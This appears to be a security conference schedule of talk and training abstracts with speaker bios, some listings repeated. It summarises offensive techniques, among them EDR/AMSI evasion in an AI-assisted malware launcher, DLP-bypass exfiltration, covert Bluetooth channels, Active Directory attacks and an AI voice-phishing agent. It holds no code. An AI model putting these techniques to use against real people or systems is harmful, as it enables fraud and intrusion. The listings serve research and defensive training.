In March, former national security advisor Mike Waltz accidentally invited a journalist into his war crimes Signal group with other senior Trump officials. “We are currently clean on OPSEC,” secretary of defense Pete Hegseth posted to the group. In May, Waltz was photographed clandestinely checking his Signal messages under the table during a cabinet meeting.
Only it turns out, Waltz was actually using a knock-off of Signal called TM SGNL. Immediately after that, TeleMessage (the company that makes TM SNGL) was hacked, and the hacker was able to access plaintext Signal messages. It was then hacked again, and the second hacker exfiltrated hundreds of gigabytes of data before TeleMessage took its service offline.
This talk is about the entire TeleMessage saga: the history of the company, which was founded by a former Israeli spook; its customers – Trump officials, US Customs and Border Protection, crypto firms, etc.; how TeleMessage archives Signal, WhatsApp, Telegram, WeChat, and SMS messages; an analysis of the TM SGNL source code that proves the company lied about supporting end-to-end encryption; the trivial exploit that was used to extract data from TeleMessage’s archive server; and how I analyzed hundreds of gigabytes of memory dumps full of chat logs from TeleMessage customers.
References:
Micah is a member of the Lockdown Systems collective. He's a coder, a security researcher, and an independent journalist. He develops open source privacy and security tools, and he's done a lot of work related to journalism and whistleblowing. He’s the former director of infosec for The Intercept. He wrote a book that teaches people how to analyze hacked and leaked datasets, Hacks, Leaks, and Revelations. He really doesn’t like the technofascist future we’ve all been forced into.
- ics Calendar file
What would it take to start a movement away from the major platforms, for people to #reclaimtech for themselves from the clutches of multi-billion dollar companies and VC backed unicorns, retrieving our data, our autonomy, and our sovereignty? We are a collection of conscientious objectors to the Big Tech ecosystems building community around peer-to-peer support and connection as we exit from these extractive ecosystems. Opting out of toxic systems, we believe, is not about digital minimalism but about opting in to stronger connections, more ethical systems, and a better future. In this talk, the Founders of Tech Reclaimers introduce our approach to bringing tech sovereignty to the masses: meeting people where they are, joining them on their journey, building confidence step by step, and fostering community in the process.
Speakers:Janet Vertesi,Andy HullJanet Vertesi (she/hers) is associate professor of sociology at Princeton University, where she is well known for her ìopt out experimentsî to evade tracking by data companies and embrace alternative tech systems, as well as for her in-depth studies of NASAís teams. An expert in the nexus between technology and society, she is a mobile Linux evangelist, teaches courses in critical technical practice and design, and sits on the advisory boards of the Data & Society Institute and the Electronic Privacy Information Center. Ask her how to make sure the Internet doesnít know that youíre pregnant.
SpeakerBio: Andy Hull, Reclaim Tech (https://www.reclaimcontrol.tech/)Andy Hull (he/him) has been abusing computers since they came with cassettes and not enough RAM. He dabbles with recreational hacking, enjoys a spot of light homelabbing, and still dreams of being a Demoscener next year. Andy believes that computers should be tools that set us free and enshrine our rights as humans, not abusive platforms that imprison and enrage us.
- ics Calendar file
The path from a working demo to an AI vishing agent that can survive in the wild is littered with failed calls and bad prompts. We walked that path so you don't have to. This talk is a rapid-fire rundown of 10 lessons learned from taking a bot into production. We'll dive into: how to craft pretexts that don't collapse under pressure, the dirty secrets of managing conversational latency, and the surprising challenge of handling accents and background noise. Iíll break down the trade-offs between self-hosted models and commercial API infrastructure, their inherent limitations, and the privacy considerations to address. Learn how to tune prompts for believable improvisation and avoid the uncanny valley.
Speakers:Matt Holland,Enrico FaccioliMatt Holland is a startup co-founder and CISO who builds security solutions designed for the real world. His career has taken him from leading security for iconic brands like Unilever and the John Lewis Partnership to his current role as co-founder of vishr.ai, a venture tackling the threat of AI-driven social engineering. His approach is a product of that journey. He tackles every challenge by blending the strategic discipline of a global CISO, the commercial focus of an MBA, the relentless drive of a startup founder, and the adversarial mindset needed to counter modern threats.
SpeakerBio: Enrico FaccioliEnrico Faccioli is a London-based entrepreneur tackling AI-driven social engineering. His latest venture, vishr.ai, uses conversational AI to provide employees with realistic vishing simulations and hands-on training. Following his MSc in Finance from Warwick Business School, he moved from overseeing the tech strategy for L&G's real assets funds (£28bn AUM), into startup leadership as COO of the geospatial AI startup Gyana, before a breach of his own fuelled a pivot into solving critical security challenges.
- ics Calendar file
Bloatware. We all hate it, and most of us are good at avoiding it. But some vendor tools – especially those managing critical drivers – can be useful when the Windows Update versions aren’t good enough for performance-critical computing.
What started as a routine driver update took a sharp turn when I confirmed a reboot modal… from my browser. Wait, my browser shouldn’t be able to do that!? To my disappointment (and maybe some surprise), it turned out to be arbitrary code execution – right from the browser. This kicked off a week-long deep dive, uncovering seven CVEs in seven days across several prominent vendors, all exploiting a common pattern: privileged services managing software on Windows with little regard for security.
In this talk, I’ll walk through the journey of discovery and exploitation of several vulnerabilities that lead to LPE/RCE. I'll cover everything from the initial attack surface discovery, reverse engineering and finally exploitation of several vulnerabilities. By the end, participants will probably be uninstalling similar software mid-session. While the exploitation journey is fun and impactful, this isn’t the kind of “access everywhere” anyone wants. It’s 2025 – we have everything we need to do better.
References:
SpeakerBio: Leon "leonjza" JacobsWith over two decades in IT - 15 years focused on cybersecurity - Leon is the CTO of Orange Cyberdefense’s SensePost Team. His career has taken him from a Tier 1 ISP, a private investment bank and now into full-time consulting, giving him a broad, real-world view of security challenges across industries. Today, Leon spends his time researching and hacking everything from enterprise networks to web and mobile applications. Passionate about building and innovating, he’s a regular contributor to the InfoSec community, sharing tools, insights, and lessons learned to help push the field forward.
- ics Calendar file
This 2-day hands-on training teaches the concepts, tools, and techniques to analyze, investigate, and hunt malware by combining two powerful techniques: malware analysis and memory forensics. This course will introduce attendees to the basics of malware analysis, reverse engineering, Windows internals, and memory forensics. Then it gradually progresses into more advanced concepts of malware analysis & memory forensics. Attendees will learn to perform static, dynamic, code, and memory analysis. To keep the training completely practical, it consists of various scenario-based hands-on labs after each module which involves analyzing real-world malware samples and investigating malware-infected memory images (crimewares, APT malwares, Fileless malwares, Rootkits, etc.). This hands-on training is designed to help attendees gain a better understanding of the subject in a short period. Throughout the course, the attendees will learn the latest techniques used by adversaries to compromise and persist on the system. In addition, it also covers various code injection, hooking, and rootkit techniques used by adversaries to bypass forensic tools and security products. In this training, you will also understand how to integrate malware analysis and memory forensics techniques into a custom sandbox to automate malware analysis. After taking this course, attendees will be better equipped with the skills to analyze, investigate, hunt, and respond to malware-related incidents.
Whether you are a beginner interested in learning malware analysis, threat hunting, and memory forensics from scratch or an experienced professional who would like to enhance your existing skills to perform a forensic investigation to respond to an incident or for fun, this training will help you accomplish your goals.
Note: Students will be provided with real-world malware samples, malware-infected memory images, course material, lab solution manual, video demos, custom scripts, and a Linux VM.
Attendees should walk away with the following skills:
Sajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
SpeakerBio: Monnappa "Monnappa22" K A, Co-Founder at CysinfoMonnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
- ics Calendar file
This 2-day hands-on training teaches the concepts, tools, and techniques to analyze, investigate, and hunt malware by combining two powerful techniques: malware analysis and memory forensics. This course will introduce attendees to the basics of malware analysis, reverse engineering, Windows internals, and memory forensics. Then it gradually progresses into more advanced concepts of malware analysis & memory forensics. Attendees will learn to perform static, dynamic, code, and memory analysis. To keep the training completely practical, it consists of various scenario-based hands-on labs after each module which involves analyzing real-world malware samples and investigating malware-infected memory images (crimewares, APT malwares, Fileless malwares, Rootkits, etc.). This hands-on training is designed to help attendees gain a better understanding of the subject in a short period. Throughout the course, the attendees will learn the latest techniques used by adversaries to compromise and persist on the system. In addition, it also covers various code injection, hooking, and rootkit techniques used by adversaries to bypass forensic tools and security products. In this training, you will also understand how to integrate malware analysis and memory forensics techniques into a custom sandbox to automate malware analysis. After taking this course, attendees will be better equipped with the skills to analyze, investigate, hunt, and respond to malware-related incidents.
Whether you are a beginner interested in learning malware analysis, threat hunting, and memory forensics from scratch or an experienced professional who would like to enhance your existing skills to perform a forensic investigation to respond to an incident or for fun, this training will help you accomplish your goals.
Note: Students will be provided with real-world malware samples, malware-infected memory images, course material, lab solution manual, video demos, custom scripts, and a Linux VM.
Attendees should walk away with the following skills:
Sajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
SpeakerBio: Monnappa "Monnappa22" K A, Co-Founder at CysinfoMonnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
- ics Calendar file
Welcome to accessDenied, a high-stakes, hands-on tabletop experience where you're not just playing cards… you're protecting critical infrastructure. Imagine trying to secure your facilities, water, power, communication, while your so-called “allies” across the table spot every vulnerability you missed. And you? You're doing the same to them. In this game, you'll simulate cyber attacks, defend your systems, and learn how breaches ripple through networks, all through fast-paced, strategic play based on real-world incidents like the Maroochy Water hack and the Kyiv power grid attack.
🔍 Who Should Play?
🎯 What You’ll Learn
accessDenied isn't just for fun, it’s designed to educate non-cybersecurity players and create smarter conversations about digital threats to critical infrastructure. Whether you're a hacker, a healthcare nerd, or just want to try something new, this tabletop challenge belongs in your DEF CON lineup.
SpeakerBio: Jack Voltaic, RITUnited States military installations and their surrounding communities share an interest in the resiliency of cyber-critical infrastructure systems. In addition to civil-military interdependencies, a failure in one critical infrastructure sector can cause cascading effects across others. ACI launched the Jack Voltaic (JV) initiative to address gaps and build resilience. Beginning with the first exercise (JV 1.0) in 2016, these exercises addressed multi-sector cyber-critical infrastructure challenges.
Civil-military Local, community level Multi-sector Unclassified
With JV 4.0, ACI’s critical infrastructure resilience program will mature and transition. Through partnerships with other academic and policy communities, ACI seeks to foster the growth of JV-inspired practices. Multiple initiatives through 2025 will build upon the momentum and lessons of JV 1.0 - 3.0.
- ics Calendar file
More than 95% of Fortune 500 companies use Active Directory! Enterprises are managed using Active Directory (AD) and it often forms the backbone of the complete enterprise network. Therefore, to secure an enterprise from an adversary, it is inevitable to secure its AD environment. To secure AD, you must understand different techniques and attacks used by adversaries against it. Often burdened with maintaining backward compatibility and interoperability with a variety of products, AD environments lack ability to tackle latest threats.
This training is aimed towards attacking modern AD with focus on OPSEC and Stealth. The training is based on real world penetration tests and Red Team engagements for highly secured environments. Some of the techniques used in the course:
The course is a mixture of fun, demos, exercises, hands-on and lecture. You start from compromise of a user desktop and work your way up to multiple forest pwnage. The training focuses more on methodology and techniques than tools.
Attendees will get free two months access to an Active Directory environment comprising of multiple domains and forests, during and after the training and a Certified Red Team Expert Exam (CRTE) certification attempt.
Speakers:Nikhil,ManthanNikhil’s areas of interest include red teaming, Azure and active directory security, attack research, defense strategies and post exploitation research. He has 15+ years of experience in red teaming.
He specializes in assessing security risks in secure environments that require novel attack vectors and "out of the box" approach. He has worked extensively on Azure, Active Directory attacks, defense and bypassing detection mechanisms. Nikhil has held trainings and bootcamps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences.
He has spoken/trained at conferences like DEF CON, BlackHat, BruCON and more.
Nikhil is the founder of Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
SpeakerBio: Manthan, Security Researcher at Altered SecurityManthan is a security researcher with a strong passion for enterprise security, red teaming and Active Directory security. He specializes in testing enterprise security defences with a deep understanding of offensive strategies, including EDR evasion and Active Directory attacks. He continuously researches emerging threats, attack techniques, and mitigation strategies to stay ahead of evolving adversaries.
He works as a Security Researcher at Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
- ics Calendar file
More than 95% of Fortune 500 companies use Active Directory! Enterprises are managed using Active Directory (AD) and it often forms the backbone of the complete enterprise network. Therefore, to secure an enterprise from an adversary, it is inevitable to secure its AD environment. To secure AD, you must understand different techniques and attacks used by adversaries against it. Often burdened with maintaining backward compatibility and interoperability with a variety of products, AD environments lack ability to tackle latest threats.
This training is aimed towards attacking modern AD with focus on OPSEC and Stealth. The training is based on real world penetration tests and Red Team engagements for highly secured environments. Some of the techniques used in the course:
The course is a mixture of fun, demos, exercises, hands-on and lecture. You start from compromise of a user desktop and work your way up to multiple forest pwnage. The training focuses more on methodology and techniques than tools.
Attendees will get free two months access to an Active Directory environment comprising of multiple domains and forests, during and after the training and a Certified Red Team Expert Exam (CRTE) certification attempt.
Speakers:Nikhil,ManthanNikhil’s areas of interest include red teaming, Azure and active directory security, attack research, defense strategies and post exploitation research. He has 15+ years of experience in red teaming.
He specializes in assessing security risks in secure environments that require novel attack vectors and "out of the box" approach. He has worked extensively on Azure, Active Directory attacks, defense and bypassing detection mechanisms. Nikhil has held trainings and bootcamps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences.
He has spoken/trained at conferences like DEF CON, BlackHat, BruCON and more.
Nikhil is the founder of Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
SpeakerBio: Manthan, Security Researcher at Altered SecurityManthan is a security researcher with a strong passion for enterprise security, red teaming and Active Directory security. He specializes in testing enterprise security defences with a deep understanding of offensive strategies, including EDR evasion and Active Directory attacks. He continuously researches emerging threats, attack techniques, and mitigation strategies to stay ahead of evolving adversaries.
He works as a Security Researcher at Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/
- ics Calendar file
When you are reverse engineering a file and have to repeatedly perform the same mundane task, you start to wonder how to perform the action automatically. This workshop provides the basis for automating tasks with Ghidra. We will look at a wiper used to target Ukrainian victims in late February 2022.
This four-hour workshop primarily focuses on how to automate repeated activities and how to think in a way that is supported by the analysis framework’s API. You can transfer this knowledge to other reverse engineering suites, although the specific API calls will differ. This class is perfect for aspiring and beginning analysts, while also providing background information and additional techniques for intermediate analysts.
The workshop’s materials consist of multiple malware samples, the precautions for which will be explained in-detail during the workshop, ensuring the safety and integrity of the systems of the attendees. An x86_64 laptop with Ubuntu 22.04 or later, along with Ghidra, Eclipse, and OpenJDK 21 is required. Its mandatory to be able to understand the basics of assembly language and decompiled code, and to be able to read and write Java. Python 2 can be used as a substitute if desired, but is not fully supported.
SpeakerBio: Max "Libra" Kersten, TrellixMax Kersten is a malware analyst, blogger, and speaker who aims to make malware analysis more approachable for those who are starting. In 2019, Max graduated cum laude with a bachelor's in IT & Cyber Security, during which Max also worked as an Android malware analyst. Currently, Max works as a senior malware analyst at Trellix, where he analyses APT malware and creates open-source tooling to aid such research. Over the past few years, Max spoke at international conferences, such as DEFCON, Black Hat (USA, EU, MEA, Asia), Botconf, Confidence-Conference, HackYeahPL, and HackFestCA. Additionally, he gave guest lectures and workshops for DEFCON, Botconf, several universities, and private entities.
- ics Calendar file
AIMAL (Artificially Intelligent Malware Launcher) is a modular red team framework built to simulate advanced malware evasion techniques against modern AV/EDR/IDS solutions. It supports Process Herpaderping, Process Hollowing, Thread Hijacking, Process Ghosting, and many other evasion techniques as delivery mechanisms, with stealth enhancements including PPID spoofing, shellcode polymorphism, syscall mutation (Hell's Gate), and aggressive AMSI/ETW bypassing. AIMAL adapts to simulated detection responses through a feedback loop that mutates behavior on the fly, rotating techniques until the payload bypasses detection. Integration with the OpenAI API allows AIMAL to suggest the best evasion strategy based on alert context, helping simulate the decision-making process of advanced threat actors. Designed for research, red teaming, and adversarial simulation, AIMAL brings real-world stealth techniques into a clean, testable interface. Live demo will include payload staging, detection simulation, and mutation in action.
Speakers:Endrit Shaqiri,Natyra ShaqiriEndrit Shaqiri is an offensive security researcher, red team tool developer, and international karate champion currently pursuing his Master’s in Cybersecurity Engineering and Cryptography at Istanbul Technical University. He is also admitted to Boston University’s Master’s in Artificial Intelligence program, where he plans to continue his research on AI-powered malware and adaptive evasion systems. He is the creator of AIMaL — the Artificially Intelligent Malware Launcher — a modular framework designed for simulating modern malware evasion techniques against AV/EDR/IDS systems. Endrit has built a tool that bridges hands-on malware development with AI-assisted mutation logic. His passion lies in crafting adaptive malware simulation frameworks for red teamers, researchers, and students alike. This is his first appearance at DEF CON, bringing a glimpse of how tomorrow’s adversaries may automate and evolve in real-time.
SpeakerBio: Natyra ShaqiriNatyra Shaqiri is a cybersecurity student at Southern Maine Community College with a growing focus on malware analysis, system security, and ethical hacking. As co-developer of AIMAL — the Artificially Intelligent Malware Launcher — Natyra has contributed to the design and modularization of the tool’s evasion techniques, helping implement feedback-driven mutation logic and stealth strategy testing. She is passionate about adversarial security, system internals, and hands-on red team simulation frameworks. This marks her debut at DEF CON, where she brings the perspective of a rising cybersecurity engineer.
- ics Calendar file
AirBleed is a proof-of-concept hack demonstrating a hidden communication technique leveraging a little-known vulnerability in macOS's Bluetooth property list files (Bluetooth.plist). By fragmenting payloads into tiny pieces and injecting them into device caches that go unnoticed by standard security tools, this capability enables operatives to establish dead-drop channels for passing critical data — all without arousing suspicion. [1] Stealth-by-Design: Uses legitimate Bluetooth device caches to hide encrypted payloads up to 248 bytes per fragment. [2] Dual-Use Impact: Enables clandestine communication or counter-plotter operations by law enforcement and intel. [3] Live Demo: DEFCON demo will allow attendees to send their own Bluetooth plist payloads to a vulnerable MacBook Pro. [4] Implications: Offers a novel toolkit for counterintelligence to monitor — and disrupt — hidden networks and dead drops.
Speakers:Ray "CURZE$" Cervantes,Yvonne "Von Marie" CervantesRay is an offensive security engineer and counterintelligence innovator with a background in forensic psychology, turning aggressive tradecraft into powerful defense tools. He is currently researching facial behavioral analysis and creating AI-driven solutions for the legal and trial consulting fields. ChatGPT, Copilot, and Claude all predict that his work will land him in handcuffs within 5–10 years — a risk Ray embraces as proof he’s pushing the boundaries of security and innovation.
SpeakerBio: Yvonne "Von Marie" CervantesYvonne is a YouTube craft content creator and handmade crafter featured in craft magazines for her work on unique art pieces. She currently designs for four design company teams and also creates comic books with Ray. She is currently researching facial behavioral analysis through designing research ideas and strategies for improving the legal and trial consulting fields.
- ics Calendar file
The Commodore 64 home computer, which sold at least 12.5 million units from 1982 to 1994, was widely used during a formative early decade in the subcultures of hacking, phreaking, piracy, and cybercrime. Like ancient insects trapped in amber, discovered and studied millions of years later, ephemera of hacker history has been fortuitously preserved in the file system structures of C64 floppy disks from the 1980s and 90s.
Enthusiasts and researchers have created byte-for-byte copies of disks in order to preserve games, applications, and demos of the time period. What is less obvious, however, is that users of the time tended to reuse disks, deleting old files to make space for new programs. This and other use patterns have resulted in interesting data being retained in unallocated sectors alongside the overtly-accessible programs and data. Often, this data can be recovered and includes logs of online sessions, hacker text files, and more.
In this talk, Dr. McGrew describes software and workflow he developed to perform forensic processing and full-text indexing of over 650,000 unique C64 floppy disk images from publicly-accessible online archives. He will also present interesting findings from searches and analysis that illustrate, for the modern audience, day-to-day hacker communications and tools of the past.
References:
Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.
- ics Calendar file
Angry Magpie is an open-source toolkit that demonstrates critical bypasses in enterprise Data Loss Prevention (DLP) systems through browser-based techniques. Our research identifies a class of attacks — Data Splicing — that enable exfiltration of sensitive data by transforming it to evade detection patterns used by both proxy and endpoint DLP solutions. The toolkit showcases four primary techniques: data sharding, ciphering, transcoding, and channel smuggling, each demonstrating specific architectural limitations in current DLP implementations. Security teams can use Angry Magpie to test their defense mechanisms against these practical attacks, providing valuable insights for enhancing data protection strategies. With browsers now serving as the primary access point for enterprise data, understanding and addressing these vulnerabilities has become essential for maintaining effective data security posture. Special thanks to Pankaj Sharma from the SquareX research team for his contributions to Angry Magpie toolkit.
Speakers:Jeswin Mathai,Xian Xiang ChangJeswin leads the design and implementation of SquareX’s infrastructure. Previously, he was part of Pentester Academy (acquired by INE) where he was responsible for managing the whole lab platform that was used by thousands of customers. A seasoned speaker and researcher, Jeswin has showcased his work at prestigious international stages such as DEF CON US, DEF CON China, RootCon, Black Hat Arsenal, and Demo Labs at DEF CON. He has also imparted his knowledge globally, training in-class sessions at Black Hat US, Asia, HITB, RootCon, and OWASP NZ Day. Jeswin is also the creator of popular open-source projects such as AWSGoat, AzureGoat, and PAToolkit.
SpeakerBio: Xian Xiang ChangXian is a software engineer at SquareX, contributing to the industry's first browser detection and response solution. With deep technical expertise in browser security, he architected DetectiveSQ, a containerized system for dynamically analyzing Chrome extensions, earning recognition at Black Hat Asia Arsenal and exemplifying his ability to transform complex security challenges into practical defensive tools.
- ics Calendar file
“Anatomy of Telecom Malware” is a Telecom Village talk spanning 2G, 3G, 4G/LTE and cloud-native 5G. It dissects how attackers weaponise every layer of the stack—SS7/SIGTRAN, Diameter, GTP, SMPP and SBA APIs—while adding three critical lenses:
Attendees leave with a telecom-specific kill-chain map, protocol-aware detection tricks, and a 10-point hardening checklist to protect both legacy and future networks.
SpeakerBio: Akib Sayyed, Founder at Matrix ShellAkib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.
Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem. linkedin.com
Across consulting engagements, Akib is known for delivering:
Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.
- ics Calendar file
Apple Intelligence, Apple’s newest AI product, is designed to enhance productivity with AI while maintaining Apple's focus on user experience and privacy, often highlighting its use of localized models as a key advantage. But how well do these assurances hold up under scrutiny? While Apple emphasizes privacy as a core principle, my findings challenge some of these claims, illustrating the importance of scrutinizing AI-driven assistants before widespread adoption.
In this talk, we take a closer look at the data flows within Apple Intelligence, examining how it interacts with user data and the potential security and privacy risks that come with it. Using traffic analysis and OS inspection techniques, we explore what information is accessed, how it moves through the system, and where it gets transmitted. Our findings challenge common security assumptions of Apple, revealing unexpected behaviors and data leaks. From encrypted traffic to data leakage concerns, this presentation will provide practical insights for users and security professionals alike.
SpeakerBio: Yoav MagidYoav Magid is a security researcher at Lumia Security, where his work centers on AI security. Yoav’s other topics of interest are social engineering and embedded operating systems. With a solid foundation in cybersecurity, Yoav holds a B.Sc. in Computer Science and is currently preparing to pursue an MBA.
Bringing over seven years of cyber security experience, he has honed his skills in embedded research and programming, tackling real-world challenges in high-stakes environments. Yoav also founded a large-scale LGBTQIA+ Employee Resource Group (ERG) that fosters international collaboration and support in his last organization.
- ics Calendar file
Electronic Frontier Foundation (EFF) is excited to be back at DEF CON. Our expert panelists will offer brief updates on EFF's work defending your digital rights, before opening the floor for attendees to ask their questions. This dynamic conversation centers challenges DEF CON attendees actually face, and is an opportunity to connect on common causes.
This year you’ll meet:
Hannah is a senior staff attorney who focuses on criminal justice, privacy, and cybersecurity issues, and is part of the Coders’ Rights Project.
SpeakerBio: Alexis Hancock, Director of Engineering at EFFAlexis is an expert technologist and researcher on the security vulnerabilities which plague consumer electronics, and can speak to the disparate impact they have on communities.
SpeakerBio: Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFFCooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.
Cooper has many years of security research experience on tools of surveillance used by government agencies.
SpeakerBio: Lisa Femia, Staff Attorney at EFFfocuses on surveillance, privacy, free speech, and the impact of technology on civil rights and civil liberties
SpeakerBio: Thorin KlosowskiThorin is the Security and Privacy Activist at EFF, where he focuses on providing practical advice to protecting online security, including handling much of Surveillance Self-Defense.
- ics Calendar file
Rapid advancements in AI raise important concerns about cybersecurity risks. While existing work shows AI still falls short of human expertise in cybersecurity, we aim to identify indicators of emerging capabilities and risks by studying the gap between AI and expert human performance. We compare top hackers—selected for their proven track record in security research and competitions—with AI systems attempting to exploit real and synthetic targets. This comparison helps us pinpoint where current frontier model evaluations fall short, what tacit knowledge is needed to exploit vulnerabilities effectively, and how these gaps might be addressed. By distilling the expertise, intuition, and problem-solving approaches that make human experts more effective than current foundation models, we highlight the unique skills that continue to differentiate human practitioners. Conversely, we seek to identify areas where AI’s latent capabilities may offer distinct advantages, helping experts better leverage these tools in their work. Our work aims to improve AI cybersecurity evaluations, address critical gaps in evidence-based policymaking, and better equip practitioners to adapt to shifts in the offense/defense landscape.
SpeakerBio: Justin W. Lin
- ics Calendar file
In today's interconnected world, software development relies heavily on third-party components---up to 80% of your code could come from external sources. This reliance creates a complex web of dependencies, making your software supply chain a prime target for cybercriminals. Securing it is no longer optional; it's essential.
This hands-on course takes a comprehensive approach to attacking and securing the software supply chain. In the first section, you'll assume the role of a sophisticated attacker, infiltrating an enterprise through its supply chain partners. You'll learn how to compromise developer laptops, code repositories, CI/CD pipelines, internal registries, and even production environments. Once you've seen how vulnerabilities can be exploited, we'll pivot to defense.
In the second section, we'll build and secure a GitHub organization, configure repositories, and implement best practices to mitigate risks. You'll learn how to secure IaC (Infrastructure as Code) assets, validate third-party code, and remediate vulnerabilities to ensure end-to-end protection.
Through practical exercises, you'll apply these strategies to safeguard your developer environments, CI/CD pipelines, and production systems. By the end of the course, you'll have the knowledge and tools to turn your software supply chain into a security strength rather than a liability.
SpeakerBio: Anant ShrivastavaAnant Shrivastava is a highly experienced information security professional with over 15 years of corporate experience. He is a frequent speaker and trainer at international conferences, and is the founder of Cyfinoid Research, a cyber security research firm. He leads open source projects such as Tamer Platform and CodeVigilant, and is actively involved in information security communities such as null, OWASP and various BSides Chapters and DefCon groups.
- ics Calendar file
In today's interconnected world, software development relies heavily on third-party components---up to 80% of your code could come from external sources. This reliance creates a complex web of dependencies, making your software supply chain a prime target for cybercriminals. Securing it is no longer optional; it's essential.
This hands-on course takes a comprehensive approach to attacking and securing the software supply chain. In the first section, you'll assume the role of a sophisticated attacker, infiltrating an enterprise through its supply chain partners. You'll learn how to compromise developer laptops, code repositories, CI/CD pipelines, internal registries, and even production environments. Once you've seen how vulnerabilities can be exploited, we'll pivot to defense.
In the second section, we'll build and secure a GitHub organization, configure repositories, and implement best practices to mitigate risks. You'll learn how to secure IaC (Infrastructure as Code) assets, validate third-party code, and remediate vulnerabilities to ensure end-to-end protection.
Through practical exercises, you'll apply these strategies to safeguard your developer environments, CI/CD pipelines, and production systems. By the end of the course, you'll have the knowledge and tools to turn your software supply chain into a security strength rather than a liability.
SpeakerBio: Anant ShrivastavaAnant Shrivastava is a highly experienced information security professional with over 15 years of corporate experience. He is a frequent speaker and trainer at international conferences, and is the founder of Cyfinoid Research, a cyber security research firm. He leads open source projects such as Tamer Platform and CodeVigilant, and is actively involved in information security communities such as null, OWASP and various BSides Chapters and DefCon groups.
- ics Calendar file
Attack Flow Detector is an open-source tool that helps defenders uncover coordinated cyber attacks buried in noisy alert data. Instead of relying on LLMs or black-box AI, it uses explainable machine learning to map alerts, logs, and telemetry to MITRE ATT&CK techniques, cluster them into contextualized attack steps, and chain them into complete killchains. Built for blue teamers and SOC analysts, it's lightweight, interpretable, and easy to deploy in real environments. This demo will show how the tool processes real-world-style data, generates actionable tickets, and supports root cause analysis. If you're drowning in false positives or lone incidents, this is for you.
